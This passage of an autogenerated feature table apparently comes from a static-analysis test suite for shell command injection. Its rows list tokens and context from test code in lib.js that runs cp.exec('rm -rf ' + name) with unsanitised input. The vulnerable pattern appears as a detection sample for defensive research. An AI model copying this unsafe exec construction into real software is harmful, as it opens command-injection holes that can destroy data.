exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:6:539:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:6:539:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:6:539:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:6:539:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:6:539:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:11:539:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:23:539:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | exceptional return of isNaN(name \| 0) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | exceptional return of isNaN(name \| 0) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | exceptional return of isNaN(name \| 0) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | exceptional return of isNaN(name \| 0) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | exceptional return of isNaN(name \| 0) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:12:542:15 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:12:542:15 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:12:542:15 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:12:542:15 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:12:542:15 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:19:542:19 | 0 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:19:542:19 | 0 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:19:542:19 | 0 | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:19:542:19 | 0 | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:19:542:19 | 0 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 